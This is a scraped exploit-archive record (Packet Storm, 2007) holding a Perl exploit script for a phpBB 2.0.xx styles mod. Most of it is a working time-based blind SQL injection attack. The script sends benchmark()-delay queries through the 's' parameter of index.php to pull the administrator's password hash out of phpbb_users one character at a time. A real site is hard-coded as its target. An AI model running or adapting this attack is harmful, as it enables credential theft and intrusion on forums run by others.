phpbbstyles-sql.txt

{"hash": "1b591d594b8074d8a5efe6366531b6e6305cb250af131ec92572a0cb7ef603f1", "sourceHref": "https://packetstormsecurity.com/files/download/59406/phpbbstyles-sql.txt", "title": "phpbbstyles-sql.txt", "id": "PACKETSTORM:59406", "published": "2007-09-19T00:00:00", "description": "", "modified": "2007-09-19T00:00:00", "sourceData": "`#--------------------------------------------------------------- \n# ____ __________ __ ____ __ \n#/_ | ____ |__\\_____ \\ _____/ |_ /_ |/ |_ \n# | |/ \\ | | _(__ <_/ ___\\ __\\ ______ | \\ __\\ \n# | | | \\ | |/ \\ \\___| | /_____/ | || | \n# |___|___| /\\__| /______ /\\___ >__| |___||__| \n# \\/\\______| \\/ \\/ \n#--------------------------------------------------------------- \n# \n#Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org \n# \n#-------------------------------------------------------------- \n# \n#Ktauber.com StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites \n# \n#--------------------------------------------------------------- \n# \n# Coded by nexen \n# \n# GreetZ: Rossi46go for code \n# \n# Description: \n# \n#XSS and SQL Injection \n# \n#--------------------------------------------------------------- \n# \n# \n# \n# \n#--------------------------------------------------------------- \n#exploit.pl \n#--------------------------------------------------------------- \n# \n# \n# \nuse LWP::UserAgent; \nuse HTTP::Request::Common; \nuse Time::HiRes; \n######################################## CONFIGURAZIONE EXPLOIT ########################################################################## \n$sito = \"http://www.forumup.com/stylesdemo/\"; # insert vulnerable site as http://[site]/[path]/ \n########################################################################################################################################## \n$var = \"1\"; \nmy $hash; \n@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); \n \nsub richiesta { \n$var = $_[0]; \n$ua = LWP::UserAgent->new; \n$inizio=Time::HiRes::time(); \n$response = $ua->request(GET $var, \ns => $var); \n$response->is_success() || print(\"$!\\n\"); \n$fine=Time::HiRes::time(); \n$tempo=$fine-$inizio; \nreturn $tempo \n} \n \nsub aggiorna{ \nsystem(\"cls\"); \nprint \"Tempo sql : \" . $_[4] . \" secondi\\n\"; \nprint \"Hash : \" . $_[3] . \"\\n\"; \n} \n \n#print richiesta; \n \nfor ($i=1;$i<33;$i++) \n{ \nfor ($j=0;$j<16;$j++) \n{ \n \n$var=$sito.\"index.php?s=(SELECT IF((ASCII(SUBSTRING(`user_password`,\".$i.\",1))=\".$array[$j].\"),benchmark(200000000,CHAR(0)),0) FROM phpbb_users WHERE `user_id`=2)/*\"; \n$tempo=richiesta($var); \naggiorna($host,$tempodefault,$j,$hash,$tempo,$i); \nif($tempo>9) \n{ \n$tempo=richiesta($var); \naggiorna($host,$tempodefault,$j,$hash,$tempo,$i); \nif($tempo>9) \n{ \n$hash .=chr($array[$j]); \naggiorna($host,$tempodefault,$j,$hash,$tempo,$i); \n$j=200; \n} \n} \n \n} \nif($i==1) \n{ \nif($hash eq \"\") \n{ \n$i=200; \nprint \"Attacco Fallito Sito Fixato\\n\"; \n} \n} \n} \n \n \nprint \"Attacco Terminato\\n\\n\"; \n \nsystem(\"pause\"); \n`\n", "reporter": "inj3ct-it.org", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "807bdc72da041f9165520549ade9c6e3"}, {"key": "modified", "hash": "096eca1b883bf3994e28586a2c5baae6"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "096eca1b883bf3994e28586a2c5baae6"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9adffcb2db33d1b05cb8f74979bff89d"}, {"key": "sourceData", "hash": "a425a75a3b81ea672bb3d98175a510f2"}, {"key": "sourceHref", "hash": "fce9e7dbedb640b24170dec473aa5e2b"}, {"key": "title", "hash": "02462ec9aa588256c3b2fcfabde777ff"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/59406/phpbbstyles-sql.txt.html", "lastseen": "2016-11-03T10:20:08", "viewCount": 0, "enchantments": {"vulnersScore": 1.7}}